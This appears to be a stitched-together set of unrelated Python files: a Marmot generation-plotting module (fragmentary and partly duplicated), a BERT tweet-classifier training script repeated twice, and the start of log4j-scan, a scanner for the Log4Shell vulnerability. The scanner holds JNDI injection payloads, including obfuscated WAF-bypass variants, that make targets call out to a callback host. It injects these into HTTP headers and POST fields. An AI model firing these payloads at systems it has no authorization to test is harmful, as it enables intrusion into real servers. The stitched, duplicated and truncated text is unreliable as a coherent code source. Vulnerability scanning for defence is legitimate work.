                    Unserved_Energy = Unserved_Energy[start_date_range: end_date_range]
                else:
                    self.logger.info("Plotting graph for entire timeperiod")

                # unitconversion based off peak generation hour, only checked once
                if i == 0:
                    unitconversion = self.capacity_energy_unitconversion(Stacked_Gen)

                Stacked_Gen = Stacked_Gen / unitconversion['divisor']
                Unserved_Energy = Unserved_Energy / unitconversion['divisor']

                scenario_names = pd.Series([scenario] * len(Stacked_Gen), name='Scenario')
                # NOTE: the nested quotes must differ from the f-string's own
                # quotes (f"...{unitconversion["units"]}..." is a SyntaxError
                # on Python < 3.12).
                data_table = Stacked_Gen.add_suffix(f" ({unitconversion['units']})")
                data_table = data_table.set_index([scenario_names], append=True)
                data_tables.append(data_table)

                for column in Stacked_Gen.columns:
                    axs[i].plot(Stacked_Gen.index.values, Stacked_Gen[column],
                                linewidth=2,
                                color=self.PLEXOS_color_dict.get(column, '#333333'),
                                label=column)

                if (Unserved_Energy == 0).all() == False:
                    axs[i].plot(Unserved_Energy, color='#DD0200',
                                label='Unserved Energy')

                mplt.set_yaxis_major_tick_format(sub_pos=i)
                axs[i].margins(x=0.01)
                mplt.set_subplot_timeseries_format(sub_pos=i)

            if not data_tables:
                self.logger.warning(f'No generation in {zone_input}')
                out = MissingZoneData()
                outputs[zone_input] = out
                continue

            data_table_out = pd.concat(data_tables)

            # add facet labels
            mplt.add_facet_labels(xlabels=self.xlabels,
                                  ylabels=self.ylabels)
            # Add legend
            mplt.add_legend(reverse_legend=True, sort_by=self.ordered_gen)
            # Remove extra subplots
            mplt.remove_excess_axs(excess_axs, grid_size)
            # Add title
            mplt.add_main_title(zone_input)
            labelpad = 40
            plt.ylabel(f"Generation ({unitconversion['units']})",
                       color='black', rotation='vertical', labelpad=labelpad)

            outputs[zone_input] = {'fig': fig, 'data_table': data_table_out}
        return outputs
| """Timeseries generation line plots.
This code creates generation non-stacked line plots.
@author: Daniel Levie
"""
import logging
import pandas as pd
import datetime as dt
import matplotlib.pyplot as plt
import marmot.config.mconfig as mconfig
from marmot.plottingmodules.plotutils.plot_library import SetupSubplot
from marmot.plottingmodules.plotutils.plot_data_helper import PlotDataHelper
from marmot.plottingmodules.plotutils.plot_exceptions import (MissingInputData, MissingZoneData)
class MPlot(PlotDataHelper):
"""generation_unstack MPlot class.
All the plotting modules use this same class name.
This class contains plotting methods that are grouped based on the
current module name.
The generation_unstack.py module contains methods that are
related to the timeseries generation of generators, displayed in an unstacked line format.
MPlot inherits from the PlotDataHelper class to assist in creating figures.
"""
def __init__(self, argument_dict: dict):
"""
Args:
argument_dict (dict): Dictionary containing all
arguments passed from MarmotPlot.
"""
# iterate over items in argument_dict and set as properties of class
# see key_list in Marmot_plot_main for list of properties
for prop in argument_dict:
self.__setattr__(prop, argument_dict[prop])
# Instantiation of MPlotHelperFunctions
super().__init__(self.Marmot_Solutions_folder, self.AGG_BY, self.ordered_gen,
self.PLEXOS_color_dict, self.Scenarios, self.ylabels,
self.xlabels, self.gen_names_dict, self.TECH_SUBSET,
Region_Mapping=self.Region_Mapping)
self.logger = logging.getLogger('marmot_plot.'+__name__)
self.curtailment_prop = mconfig.parser("plot_data","curtailment_property")
def gen_unstack(self, figure_name: str = None, prop: str = None,
                start: float = None, end: float = None,
                timezone: str = "", start_date_range: str = None,
                end_date_range: str = None, **_) -> dict:
    """Creates a timeseries plot of generation by technology each plotted as a line.

    If multiple scenarios are passed they will be plotted in a facet plot.
    The plot can be further customized by passing specific values to the
    prop argument.

    Args:
        figure_name (str, optional): User defined figure output name.
            Also controls layout: a name containing 'Facet' switches to a
            multi-scenario facet plot.
            Defaults to None.
        prop (str, optional): Special argument used to adjust specific
            plot settings. Controlled through the plot_select.csv.
            Options available are:
            - Peak Demand
            - Min Net Load
            - Date Range
            Defaults to None.
        start (float, optional): Used in conjunction with the prop argument.
            Will define the number of days to plot before a certain event in
            a timeseries plot, e.g Peak Demand.
            Defaults to None.
        end (float, optional): Used in conjunction with the prop argument.
            Will define the number of days to plot after a certain event in
            a timeseries plot, e.g Peak Demand.
            Defaults to None.
        timezone (str, optional): The timezone to display on the x-axes.
            Defaults to "".
            NOTE(review): accepted but not referenced in this body — confirm
            whether it should be passed to the x-axis formatting call.
        start_date_range (str, optional): Defines a start date at which to represent data from.
            Defaults to None.
        end_date_range (str, optional): Defines a end date at which to represent data to.
            Defaults to None.

    Returns:
        dict: dictionary keyed by zone/region containing the created plot
        and its data table (or MissingInputData/MissingZoneData markers).
    """
    outputs = {}
    # Facet layout is opted into through the figure name.
    facet = False
    if 'Facet' in figure_name:
        facet = True
    # Aggregation level: anything other than 'zone' is treated as 'region'.
    if self.AGG_BY == 'zone':
        agg = 'zone'
    else:
        agg = 'region'

    def getdata(scenario_list):
        # List of properties needed by the plot, properties are a set of tuples and contain 3 parts:
        # required True/False, property name and scenarios required, scenarios must be a list.
        properties = [(True, "generator_Generation", scenario_list),
                      (False, f"generator_{self.curtailment_prop}", scenario_list),
                      (False, "generator_Pump_Load", scenario_list),
                      (True, f"{agg}_Load", scenario_list),
                      (False, f"{agg}_Unserved_Energy", scenario_list)]
        # Runs get_formatted_data within PlotDataHelper to populate PlotDataHelper dictionary
        # with all required properties, returns a 1 if required data is missing
        return self.get_formatted_data(properties)

    # Facet plots use every scenario; otherwise only the first one is drawn.
    if facet:
        check_input_data = getdata(self.Scenarios)
        all_scenarios = self.Scenarios
    else:
        check_input_data = getdata([self.Scenarios[0]])
        all_scenarios = [self.Scenarios[0]]
    # Checks if all data required by plot is available, if 1 in list required data is missing
    if 1 in check_input_data:
        outputs = MissingInputData()
        return outputs
    # sets up x, y dimensions of plot
    ncols, nrows = self.set_facet_col_row_dimensions(multi_scenario=all_scenarios)
    # If the plot is not a facet plot, grid size should be 1x1
    if not facet:
        ncols = 1
        nrows = 1
    grid_size = ncols*nrows
    # Used to calculate any excess axis to delete
    plot_number = len(all_scenarios)
    for zone_input in self.Zones:
        self.logger.info(f"Zone = {zone_input}")
        excess_axs = grid_size - plot_number
        mplt = SetupSubplot(nrows, ncols, sharey=True,
                            squeeze=False, ravel_axs=True)
        fig, axs = mplt.get_figure()
        plt.subplots_adjust(wspace=0.05, hspace=0.5)
        # If creating a facet plot the font is scaled by 9% for each added x dimesion fact plot
        if ncols > 1:
            font_scaling_ratio = 1 + ((ncols-1)*0.09)
            plt.rcParams['xtick.labelsize'] *= font_scaling_ratio
            plt.rcParams['ytick.labelsize'] *= font_scaling_ratio
            plt.rcParams['legend.fontsize'] *= font_scaling_ratio
            plt.rcParams['axes.labelsize'] *= font_scaling_ratio
            plt.rcParams['axes.titlesize'] *= font_scaling_ratio
        data_tables = []
        for i, scenario in enumerate(all_scenarios):
            self.logger.info(f"Scenario = {scenario}")
            try:
                Stacked_Gen = self["generator_Generation"].get(scenario).copy()
                if self.shift_leapday == True:
                    Stacked_Gen = self.adjust_for_leapday(Stacked_Gen)
                # KeyError here means the zone has no generation data.
                Stacked_Gen = Stacked_Gen.xs(zone_input, level=self.AGG_BY)
            except KeyError:
                # self.logger.info('No generation in %s',zone_input)
                continue
            if Stacked_Gen.empty == True:
                continue
            Stacked_Gen = self.df_process_gen_inputs(Stacked_Gen)
            # Insert Curtailment into gen stack if it exists in database
            Stacked_Curt = self[f"generator_{self.curtailment_prop}"].get(scenario).copy()
            if not Stacked_Curt.empty:
                curtailment_name = self.gen_names_dict.get('Curtailment', 'Curtailment')
                if self.shift_leapday == True:
                    Stacked_Curt = self.adjust_for_leapday(Stacked_Curt)
                if zone_input in Stacked_Curt.index.get_level_values(self.AGG_BY).unique():
                    Stacked_Curt = Stacked_Curt.xs(zone_input, level=self.AGG_BY)
                    Stacked_Curt = self.df_process_gen_inputs(Stacked_Curt)
                    # If using Marmot's curtailment property
                    if self.curtailment_prop == 'Curtailment':
                        Stacked_Curt = self.assign_curtailment_techs(Stacked_Curt)
                    # Collapse the per-tech curtailment columns to one series.
                    Stacked_Curt = Stacked_Curt.sum(axis=1)
                    Stacked_Curt[Stacked_Curt<0.05] = 0 #Remove values less than 0.05 MW
                    Stacked_Gen.insert(len(Stacked_Gen.columns), column=curtailment_name, value=Stacked_Curt) #Insert curtailment into
                    # Calculates Net Load by removing variable gen + curtailment
                    vre_gen_cat = self.vre_gen_cat + [curtailment_name]
                else:
                    vre_gen_cat = self.vre_gen_cat
            else:
                vre_gen_cat = self.vre_gen_cat
            # Adjust list of values to drop depending on if it exists in Stacked_Gen df
            vre_gen_cat = [name for name in vre_gen_cat if name in Stacked_Gen.columns]
            Net_Load = Stacked_Gen.drop(labels=vre_gen_cat, axis=1)
            Net_Load = Net_Load.sum(axis=1)
            # Drop technologies that are zero for the whole period.
            Stacked_Gen = Stacked_Gen.loc[:, (Stacked_Gen != 0).any(axis=0)]
            Load = self[f"{agg}_Load"].get(scenario).copy()
            if self.shift_leapday == True:
                Load = self.adjust_for_leapday(Load)
            Load = Load.xs(zone_input, level=self.AGG_BY)
            Load = Load.groupby(["timestamp"]).sum()
            Load = Load.squeeze() #Convert to Series
            Pump_Load = self["generator_Pump_Load"][scenario].copy()
            # Substitute an all-zero frame when pump load is absent so the
            # arithmetic below stays shape-compatible.
            if Pump_Load.empty:
                Pump_Load = self['generator_Generation'][scenario].copy()
                Pump_Load.iloc[:, 0] = 0
            if self.shift_leapday == True:
                Pump_Load = self.adjust_for_leapday(Pump_Load)
            Pump_Load = Pump_Load.xs(zone_input, level=self.AGG_BY)
            Pump_Load = Pump_Load.groupby(["timestamp"]).sum()
            Pump_Load = Pump_Load.squeeze() #Convert to Series
            # Pump_Load becomes "load net of pumping" when pumping exists.
            if (Pump_Load == 0).all() == False:
                Pump_Load = Load - Pump_Load
            else:
                Pump_Load = Load
            Unserved_Energy = self[f"{agg}_Unserved_Energy"][scenario].copy()
            # Same zero-substitution trick for missing unserved energy.
            if Unserved_Energy.empty:
                Unserved_Energy = self[f"{agg}_Load"][scenario].copy()
                Unserved_Energy.iloc[:, 0] = 0
            if self.shift_leapday == True:
                Unserved_Energy = self.adjust_for_leapday(Unserved_Energy)
            Unserved_Energy = Unserved_Energy.xs(zone_input, level=self.AGG_BY)
            Unserved_Energy = Unserved_Energy.groupby(["timestamp"]).sum()
            Unserved_Energy = Unserved_Energy.squeeze() #Convert to Series
            # Window the timeseries around the requested event / date range.
            if prop == "Peak Demand":
                peak_pump_load_t = Pump_Load.idxmax()
                end_date = peak_pump_load_t + dt.timedelta(days=end)
                start_date = peak_pump_load_t - dt.timedelta(days=start)
                # Peak_Pump_Load = Pump_Load[peak_pump_load_t]
                Stacked_Gen = Stacked_Gen[start_date : end_date]
                Load = Load[start_date : end_date]
                Unserved_Energy = Unserved_Energy[start_date : end_date]
                Pump_Load = Pump_Load[start_date : end_date]
            elif prop == "Min Net Load":
                min_net_load_t = Net_Load.idxmin()
                end_date = min_net_load_t + dt.timedelta(days=end)
                start_date = min_net_load_t - dt.timedelta(days=start)
                # Min_Net_Load = Net_Load[min_net_load_t]
                Stacked_Gen = Stacked_Gen[start_date : end_date]
                Load = Load[start_date : end_date]
                Unserved_Energy = Unserved_Energy[start_date : end_date]
                Pump_Load = Pump_Load[start_date : end_date]
            elif pd.notna(start_date_range):
                self.logger.info(f"Plotting specific date range: \
{str(start_date_range)} to {str(end_date_range)}")
                Stacked_Gen = Stacked_Gen[start_date_range : end_date_range]
                Load = Load[start_date_range : end_date_range]
                Unserved_Energy = Unserved_Energy[start_date_range : end_date_range]
            else:
                self.logger.info("Plotting graph for entire timeperiod")
            # unitconversion based off peak generation hour, only checked once
            if i == 0:
                unitconversion = self.capacity_energy_unitconversion(Stacked_Gen)
            Stacked_Gen = Stacked_Gen/unitconversion['divisor']
            Unserved_Energy = Unserved_Energy/unitconversion['divisor']
            # Tag rows with the scenario so facet tables can be concatenated.
            scenario_names = pd.Series([scenario]*len(Stacked_Gen), name='Scenario')
            data_table = Stacked_Gen.add_suffix(f" ({unitconversion['units']})")
            data_table = data_table.set_index([scenario_names], append=True)
            data_tables.append(data_table)
            # One line per technology, colored by the PLEXOS palette.
            for column in Stacked_Gen.columns:
                axs[i].plot(Stacked_Gen.index.values, Stacked_Gen[column],
                            linewidth=2,
                            color=self.PLEXOS_color_dict.get(column, '#333333'),
                            label=column)
            if (Unserved_Energy == 0).all() == False:
                axs[i].plot(Unserved_Energy, color='#DD0200',
                            label='Unserved Energy')
            mplt.set_yaxis_major_tick_format(sub_pos=i)
            axs[i].margins(x=0.01)
            mplt.set_subplot_timeseries_format(sub_pos=i)
        # No scenario produced data for this zone — record a placeholder.
        if not data_tables:
            self.logger.warning(f'No generation in {zone_input}')
            out = MissingZoneData()
            outputs[zone_input] = out
            continue
        data_table_out = pd.concat(data_tables)
        # add facet labels
        mplt.add_facet_labels(xlabels=self.xlabels,
                              ylabels=self.ylabels)
        # Add legend
        mplt.add_legend(reverse_legend=True, sort_by=self.ordered_gen)
        # Remove extra supl
        mplt.remove_excess_axs(excess_axs, grid_size)
        # Add title
        mplt.add_main_title(zone_input)
        labelpad = 40
        plt.ylabel(f"Generation ({unitconversion['units']})",
                   color='black', rotation='vertical', labelpad=labelpad)
        outputs[zone_input] = {'fig':fig, 'data_table':data_table_out}
    return outputs
|
import os
import batch
import preprocessing
import train
import predict
import pandas as pd
from matplotlib import pyplot as plt
from covidDataset import CovidDataset
from torch.utils.data import DataLoader
from transformers import BertForSequenceClassification, BertTokenizer
from sklearn.model_selection import train_test_split
from torch import device, cuda, save
from collections import defaultdict

# Fix: the CUDA device selector is CUDA_VISIBLE_DEVICES (plural);
# the singular spelling is silently ignored by the driver.
os.environ['CUDA_VISIBLE_DEVICES'] = '0'

# Preprocess training data
train_file = os.path.join('./', 'TwitterPost', 'train.csv')
df_train, map_en = preprocessing.preprocess(train_file)
# Preprocess testing data
test_file = os.path.join('./', 'TwitterPost', 'test.csv')
df_test, map_en = preprocessing.preprocess(test_file)

# Load bert model and tokenizer
PRETRAINED_MODEL_NAME = 'bert-base-uncased'
tokenizer = BertTokenizer.from_pretrained(PRETRAINED_MODEL_NAME, do_lower_case=True)

# Self define Covid-train-Dataset and check the first sample
# i.e., converted (tokens_tensor, segments_tensor, label_tensor)
train_set = CovidDataset(df_train, tokenizer=tokenizer)
label, text = train_set.df.iloc[0].values
tokens_tensor, segments_tensor, label_tensor = train_set[0]

# Deduction to original text
tokens = tokenizer.convert_ids_to_tokens(tokens_tensor)
combined_text = ' '.join(tokens)
print(f"""[Original]\n
Text: {text}
Label: {label}
--------------------
[Coverted tensors]\n
tokens_tensor :{tokens_tensor}
segments_tensor:{segments_tensor}
label_tensor :{label_tensor}
#--------------------
#
#[Original tokens_tensors]\n
#{combined_text}
#\n""")

# DataLoader returned 64 samples at a time,
# "collate_fn" parameter defined the batch output
BATCH_SIZE = 64
train_set, val_set = train_test_split(train_set, test_size=0.1, random_state=2000)
train_loader = DataLoader(train_set, batch_size=BATCH_SIZE, collate_fn=batch.create_mini_batch)
val_loader = DataLoader(val_set, batch_size=BATCH_SIZE, collate_fn=batch.create_mini_batch)
data = next(iter(train_loader))
tokens_tensors, segments_tensors, masks_tensors, label_ids = data
print(f"""
tokens_tensors.shape = {tokens_tensors.shape}
{tokens_tensors}
------------------------
segments_tensors.shape = {segments_tensors.shape}
{segments_tensors}
------------------------
masks_tensors.shape = {masks_tensors.shape}
{masks_tensors}
------------------------
label_ids.shape = {label_ids.shape}
{label_ids}
""")

# Fine-tune task is "BertForSequenceClassification"
model = BertForSequenceClassification.from_pretrained(
    PRETRAINED_MODEL_NAME, num_labels=4)

# Numbers of parameters
model_params = [p for p in model.parameters() if p.requires_grad]
clf_params = [p for p in model.classifier.parameters() if p.requires_grad]
print(f"""
Parameters of total classifier(Bert + Linear):{sum(p.numel() for p in model_params)}
Parameters of linear classifier:{sum(p.numel() for p in clf_params)}
""")

## Let's begin to train and fine-tune
# NOTE: rebinds the imported `device` factory to the selected device object;
# only the instance is needed from here on.
device = device('cuda:0' if cuda.is_available() else 'cpu')
print('device:', device)
model = model.to(device)
print('\n###Start training###\n')
# Fix: reusing double quotes inside a double-quoted f-string is a
# SyntaxError before Python 3.12 — quote the field names with single quotes.
print(f"{'Epoch':^7} | {'Train loss':^12} | {'Train accuracy':^9} |{'Val loss':^12} | {'Val accuracy':^9} |")
print("-" * 70)

EPOCHS = 4
history = defaultdict(list)
# Fix: track the best validation accuracy across epochs. The original reset
# best_accuracy to 0 inside the loop and never updated it, so the checkpoint
# was overwritten every epoch regardless of quality.
best_accuracy = 0
for epoch in range(EPOCHS):
    # Training
    train_acc, train_loss = train.train_epoch(model, train_loader, device)
    print(f"{epoch + 1:^7} | {train_loss:^12.6f} | {train_acc:^15.2f}", end='')
    # Evaluating
    val_acc, val_loss = train.eval_epoch(model, val_loader, device)
    print(f"| {val_loss:^11.6f} | {val_acc:^14.2f}")
    print()
    history['train_acc'].append(train_acc)
    history['train_loss'].append(train_loss)
    history['val_acc'].append(val_acc)
    history['val_loss'].append(val_loss)
    # Save the best model seen so far
    if val_acc > best_accuracy:
        best_accuracy = val_acc
        save(model.state_dict(), 'best_model_state.bin')
print('Training complete!')

# Plot the accuracy curves
plt.plot(history['train_acc'], label='train acc')
plt.plot(history['val_acc'], label='val acc')
plt.title('Accuracy history')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend()
plt.ylim([0, 1])
plt.grid()
plt.savefig('acc_history.png')
plt.clf()

# Plot the loss curves
plt.plot(history['train_loss'], label='train loss')
plt.plot(history['val_loss'], label='val loss')
plt.title('Loss history')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend()
plt.grid()
plt.savefig('loss_history.png')

# Inference with test set
test_set = CovidDataset(df_test, tokenizer=tokenizer)
test_loader = DataLoader(test_set, batch_size=256,
                         collate_fn=batch.create_mini_batch)
# TODO(review): get_predictions appears to return a tuple holding the same
# predictions twice — confirm against predict.py; only index 0 is used here.
predictions = predict.get_predictions(model, test_loader, device)
# Concat predition to .csv
df_pred = df_test
df_pred['prediction'] = predictions[0].tolist()
df_pred.to_csv('predict.csv', index=False)
import os
import batch
import preprocessing
import train
import predict
import pandas as pd
from matplotlib import pyplot as plt
from covidDataset import CovidDataset
from torch.utils.data import DataLoader
from transformers import BertForSequenceClassification, BertTokenizer
from sklearn.model_selection import train_test_split
from torch import device, cuda, save
from collections import defaultdict

# Fix: the CUDA device selector is CUDA_VISIBLE_DEVICES (plural);
# the singular spelling is silently ignored by the driver.
os.environ['CUDA_VISIBLE_DEVICES'] = '0'

# Preprocess training data
train_file = os.path.join('./', 'TwitterPost', 'train.csv')
df_train, map_en = preprocessing.preprocess(train_file)
# Preprocess testing data
test_file = os.path.join('./', 'TwitterPost', 'test.csv')
df_test, map_en = preprocessing.preprocess(test_file)

# Load bert model and tokenizer
PRETRAINED_MODEL_NAME = 'bert-base-uncased'
tokenizer = BertTokenizer.from_pretrained(PRETRAINED_MODEL_NAME, do_lower_case=True)

# Self define Covid-train-Dataset and check the first sample
# i.e., converted (tokens_tensor, segments_tensor, label_tensor)
train_set = CovidDataset(df_train, tokenizer=tokenizer)
label, text = train_set.df.iloc[0].values
tokens_tensor, segments_tensor, label_tensor = train_set[0]

# Deduction to original text
tokens = tokenizer.convert_ids_to_tokens(tokens_tensor)
combined_text = ' '.join(tokens)
print(f"""[Original]\n
Text: {text}
Label: {label}
--------------------
[Coverted tensors]\n
tokens_tensor :{tokens_tensor}
segments_tensor:{segments_tensor}
label_tensor :{label_tensor}
#--------------------
#
#[Original tokens_tensors]\n
#{combined_text}
#\n""")

# DataLoader returned 64 samples at a time,
# "collate_fn" parameter defined the batch output
BATCH_SIZE = 64
train_set, val_set = train_test_split(train_set, test_size=0.1, random_state=2000)
train_loader = DataLoader(train_set, batch_size=BATCH_SIZE, collate_fn=batch.create_mini_batch)
val_loader = DataLoader(val_set, batch_size=BATCH_SIZE, collate_fn=batch.create_mini_batch)
data = next(iter(train_loader))
tokens_tensors, segments_tensors, masks_tensors, label_ids = data
print(f"""
tokens_tensors.shape = {tokens_tensors.shape}
{tokens_tensors}
------------------------
segments_tensors.shape = {segments_tensors.shape}
{segments_tensors}
------------------------
masks_tensors.shape = {masks_tensors.shape}
{masks_tensors}
------------------------
label_ids.shape = {label_ids.shape}
{label_ids}
""")

# Fine-tune task is "BertForSequenceClassification"
model = BertForSequenceClassification.from_pretrained(
    PRETRAINED_MODEL_NAME, num_labels=4)

# Numbers of parameters
model_params = [p for p in model.parameters() if p.requires_grad]
clf_params = [p for p in model.classifier.parameters() if p.requires_grad]
print(f"""
Parameters of total classifier(Bert + Linear):{sum(p.numel() for p in model_params)}
Parameters of linear classifier:{sum(p.numel() for p in clf_params)}
""")

## Let's begin to train and fine-tune
# NOTE: rebinds the imported `device` factory to the selected device object;
# only the instance is needed from here on.
device = device('cuda:0' if cuda.is_available() else 'cpu')
print('device:', device)
model = model.to(device)
print('\n###Start training###\n')
print(f"{'Epoch':^7} | {'Train loss':^12} | {'Train accuracy':^9} |{'Val loss':^12} | {'Val accuracy':^9} |")
print("-" * 70)

EPOCHS = 4
history = defaultdict(list)
# Fix: track the best validation accuracy across epochs. The original reset
# best_accuracy to 0 inside the loop and never updated it, so the checkpoint
# was overwritten every epoch regardless of quality.
best_accuracy = 0
for epoch in range(EPOCHS):
    # Training
    train_acc, train_loss = train.train_epoch(model, train_loader, device)
    print(f"{epoch + 1:^7} | {train_loss:^12.6f} | {train_acc:^15.2f}", end='')
    # Evaluating
    val_acc, val_loss = train.eval_epoch(model, val_loader, device)
    print(f"| {val_loss:^11.6f} | {val_acc:^14.2f}")
    print()
    history['train_acc'].append(train_acc)
    history['train_loss'].append(train_loss)
    history['val_acc'].append(val_acc)
    history['val_loss'].append(val_loss)
    # Save the best model seen so far
    if val_acc > best_accuracy:
        best_accuracy = val_acc
        save(model.state_dict(), 'best_model_state.bin')
print('Training complete!')

# Plot the accuracy curves
plt.plot(history['train_acc'], label='train acc')
plt.plot(history['val_acc'], label='val acc')
plt.title('Accuracy history')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend()
plt.ylim([0, 1])
plt.grid()
plt.savefig('acc_history.png')
plt.clf()

# Plot the loss curves
plt.plot(history['train_loss'], label='train loss')
plt.plot(history['val_loss'], label='val loss')
plt.title('Loss history')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend()
plt.grid()
plt.savefig('loss_history.png')

# Inference with test set
test_set = CovidDataset(df_test, tokenizer=tokenizer)
test_loader = DataLoader(test_set, batch_size=256,
                         collate_fn=batch.create_mini_batch)
# TODO(review): get_predictions appears to return a tuple holding the same
# predictions twice — confirm against predict.py; only index 0 is used here.
predictions = predict.get_predictions(model, test_loader, device)
# Concat predition to .csv
df_pred = df_test
df_pred['prediction'] = predictions[0].tolist()
df_pred.to_csv('predict.csv', index=False)
|
#!/usr/bin/env python3
# coding=utf-8
# ******************************************************************
# log4j-scan: A generic scanner for Apache log4j RCE CVE-2021-44228
# Original Author:
# Mazin Ahmed <Mazin at FullHunt.io>
# Modified by Megan Howell (CyberQueenMeg)
# Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
# Secure your Attack Surface with FullHunt.io.
# ******************************************************************
import argparse
import random
import requests
import time
import sys
from urllib import parse as urlparse
import base64
import json
import random
from uuid import uuid4
from base64 import b64encode
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from termcolor import cprint
# Disable SSL warnings
# (requests is used with verify=False throughout; silence urllib3's noise)
try:
    import requests.packages.urllib3
    requests.packages.urllib3.disable_warnings()
except Exception:
    pass
cprint('[•] CVE-2021-44228 - Apache Log4j RCE Scanner', "green")
cprint('[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.', "yellow")
cprint('[•] Secure your External Attack Surface with FullHunt.io.', "yellow")
# Nothing to scan without arguments; point the user at --help.
if len(sys.argv) <= 1:
    print('\n%s -h for help.' % (sys.argv[0]))
    exit(0)
# Baseline headers for every request; individual header values are
# overwritten with the payload during fuzzing (see get_fuzzing_headers).
default_headers = {
    'User-Agent': 'log4j-scan (https://github.com/mazen160/log4j-scan)',
    # 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36',
    'Accept': '*/*'  # not being tested to allow passing through checks on Accept header in older web-servers
}
# POST form/JSON parameter names that receive the payload.
post_data_parameters = ["username", "user", "email", "email_address", "password"]
# Per-request timeout in seconds.
timeout = 4
# Obfuscated JNDI payload templates for --waf-bypass;
# {{callback_host}} and {{random}} are substituted before sending.
waf_bypass_payloads = ["${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{callback_host}}/{{random}}}",
                       "${${::-j}ndi:rmi://{{callback_host}}/{{random}}}",
                       "${jndi:rmi://{{callback_host}}}",
                       "${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}",
                       "${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
                       "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
                       "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
                       "${jndi:dns://{{callback_host}}}",
                       ]
# Detection payloads for the CVE-2021-45046 patch bypass (--test-CVE-2021-45046).
cve_2021_45046 = [
    "${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}",  # Source: https://twitter.com/marcioalm/status/1471740771581652995,
    "${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}",
    "${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}"
]
# Detection payload for CVE-2021-45105 (context lookup DoS).
cve_2021_45105 = [
    "$${ctx:loginId}"
]
# Command-line interface.
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
                    dest="url",
                    help="Check a single URL.",
                    action='store')
parser.add_argument("-p", "--proxy",
                    dest="proxy",
                    help="send requests through proxy",
                    action='store')
parser.add_argument("-l", "--list",
                    dest="usedlist",
                    help="Check a list of URLs.",
                    action='store')
parser.add_argument("--request-type",
                    dest="request_type",
                    help="Request Type: (get, post) - [Default: get].",
                    default="get",
                    action='store')
parser.add_argument("--headers-file",
                    dest="headers_file",
                    help="Headers fuzzing list - [default: headers.txt].",
                    default="headers.txt",
                    action='store')
parser.add_argument("--run-all-tests",
                    dest="run_all_tests",
                    help="Run all available tests on each URL.",
                    action='store_true')
parser.add_argument("--exclude-user-agent-fuzzing",
                    dest="exclude_user_agent_fuzzing",
                    help="Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.",
                    action='store_true')
parser.add_argument("--wait-time",
                    dest="wait_time",
                    help="Wait time after all URLs are processed (in seconds) - [Default: 5].",
                    default=5,
                    type=int,
                    action='store')
parser.add_argument("--waf-bypass",
                    dest="waf_bypass_payloads",
                    help="Extend scans with WAF bypass payloads.",
                    action='store_true')
parser.add_argument("--test-CVE-2021-45046",
                    dest="cve_2021_45046",
                    help="Test using payloads for CVE-2021-45046 (detection payloads).",
                    action='store_true')
parser.add_argument("--test-CVE-2021-45105",
                    dest="cve_2021_45105",
                    help="Test using payloads for CVE-2021-45105 (detection payloads).",
                    action='store_true')
parser.add_argument("--dns-callback-provider",
                    dest="dns_callback_provider",
                    help="DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh].",
                    default="interact.sh",
                    action='store')
parser.add_argument("--custom-dns-callback-host",
                    dest="custom_dns_callback_host",
                    help="Custom DNS Callback Host.",
                    action='store')
parser.add_argument("--disable-http-redirects",
                    dest="disable_redirects",
                    help="Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.",
                    action='store_true')
args = parser.parse_args()
# Route traffic through the user-supplied proxy for both schemes.
proxies = {}
if args.proxy:
    proxies = {"http": args.proxy, "https": args.proxy}
def get_fuzzing_headers(payload):
    """Build the request headers for one fuzzing request.

    Every header name listed in the headers file is set to *payload*, on
    top of the default headers. Lines that are empty or start with '#'
    are skipped. With --exclude-user-agent-fuzzing the User-Agent is
    restored to its default value.
    """
    fuzzing_headers = {}
    fuzzing_headers.update(default_headers)
    with open(args.headers_file, "r") as f:
        for i in f.readlines():
            i = i.strip()
            if i == "" or i.startswith("#"):
                continue
            fuzzing_headers.update({i: payload})
    if args.exclude_user_agent_fuzzing:
        fuzzing_headers["User-Agent"] = default_headers["User-Agent"]
    # Referer should look like a URL so strict servers still log it.
    # Fix: the original indexed fuzzing_headers['Referer'] unconditionally
    # (KeyError when the headers file has no Referer line) and nested single
    # quotes inside a single-quoted f-string (SyntaxError before Python 3.12).
    if "Referer" in fuzzing_headers:
        fuzzing_headers["Referer"] = f"https://{fuzzing_headers['Referer']}"
    return fuzzing_headers
def get_fuzzing_post_data(payload):
    """Map every fuzzed POST parameter name to *payload*."""
    return {param: payload for param in post_data_parameters}
def generate_waf_bypass_payloads(callback_host, random_string):
    """Fill the WAF-bypass payload templates with the callback host and
    the per-target random marker."""
    return [template.replace("{{callback_host}}", callback_host)
                    .replace("{{random}}", random_string)
            for template in waf_bypass_payloads]
def get_cve_2021_45046_payloads(callback_host, random_string):
    """Fill the CVE-2021-45046 payload templates with the callback host
    and the per-target random marker."""
    return [template.replace("{{callback_host}}", callback_host)
                    .replace("{{random}}", random_string)
            for template in cve_2021_45046]
def get_cve_2021_45105_payloads(callback_host, random_string):
    """Fill the CVE-2021-45105 payload templates with the callback host
    and the per-target random marker."""
    return [template.replace("{{callback_host}}", callback_host)
                    .replace("{{random}}", random_string)
            for template in cve_2021_45105]
class Dnslog(object):
    """Minimal dnslog.cn client: registers a throwaway callback domain and
